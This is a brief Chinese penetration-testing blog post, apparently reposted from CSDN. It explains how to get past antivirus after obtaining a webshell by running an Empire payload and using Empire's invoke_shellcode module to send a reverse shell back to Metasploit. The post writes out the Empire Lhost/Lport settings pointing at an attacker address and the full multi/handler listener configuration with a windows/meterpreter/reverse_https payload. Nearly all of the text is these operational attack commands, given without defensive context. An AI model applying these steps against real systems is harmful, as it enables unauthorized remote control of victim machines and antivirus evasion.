渗透之——Empire 反弹回 Metasploit

转载请注明出处:https://blog.csdn.net/l1028386804/article/details/86178038

在实际渗透中,当拿到WebShell上传的MSF客户端无法绕过目标主机的杀毒软件时,可以使用PowerShell来绕过,也可以执行Empire的Payload来绕过,成功之后再使用Empiore的模块将其反弹回Metasploit。
这里使用Empire的usemodule code_execution/invoke_shellcode模块修改两个参数:Lhost、Lport。将Lhost修改为MSF所在主机的IP,按以下命令设置:

set Lhost 192.168.31.247
set Lport 4444

在MSF上设置监听,命令如下:

use exploit/multi/handler
set payload windows/meterpreter/reverse_https
set lhost 192.168.31.247
set lport 4444
run

运行后,就可以收到Empire反弹回来的Shell

渗透之——Empire 反弹回 Metasploit_第1张图片

 

你可能感兴趣的:(渗透)